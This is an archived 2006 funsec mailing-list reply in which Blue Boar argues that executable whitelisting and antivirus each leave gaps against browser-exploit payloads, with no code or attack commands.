funsec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: standards status in the industry - opinion?

From: Blue Boar <BlueBoar () thievco com>
Date: Sun, 08 Jan 2006 09:23:38 -0800
Nick FitzGerald wrote:
So, you're saying that just because a bunch of morons designed something utterly brokenly (from a security perspective) from the outset _AND_ that much of the world "enjoys" the flexibility this approach has allowed (or is just too damned ill-informed or otherwise stupid to know any better), THAT informed security professionals (and others) should not try to get such gross stupidity fixed?
I'm not saying that you shouldn't try, just that you probably won't succeed. In my experience, you "can't" take away some feature people like.
And this is somewhat secondary anyway, for most/all script-based browser exploits _still_ have to drop some or other identifiably "executable" code (be it a binary or a file-based script or a file- based macro or a file-based <whatever>) to do the bulk of the actual nastiness, and the whitelisting-based, integrity enforcement will _still_ stop the "payload" of the attack, even if their browser is vulnerable.
I believe you can simply string together whitelisted programs to do what you like. Things like tftp.exe and format.exe.
With known virus scanning you have to hope like hell that either your virus scanner has a good enough, generic enough (without raising silly FPs) detection of the browser exploit and will stop it (or at least alert you things have gone pear-shaped) as the bad HTML/script is written to the local browser cache OR that it already detects whatever it is that is dropped/further executes, etc (which increasingly, it doesn't).
I wasn't even neccessarily talking about vulnerabilities per se. I don't consider enabling viruses to be a vulnerability, really. Just a side-effect of a general purpose OS.
Such a whitelisting approach then _mainly_ only leaves you vulnerable to arbitrary code execution through buffer overflows and the like and other forms of mitigation (reducing exposed services, developer education, improvements in compiler and runtime execution checks, DEP/NX/etc, and so on) are available to varying degrees for those.
But to your point, whitelisting executables still leaves you vulnerable to things like core worms, and you still have to have other security measures to deal with those problems. 

                                                BB
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
Previous By Date Next
Previous By Thread Next

Current thread: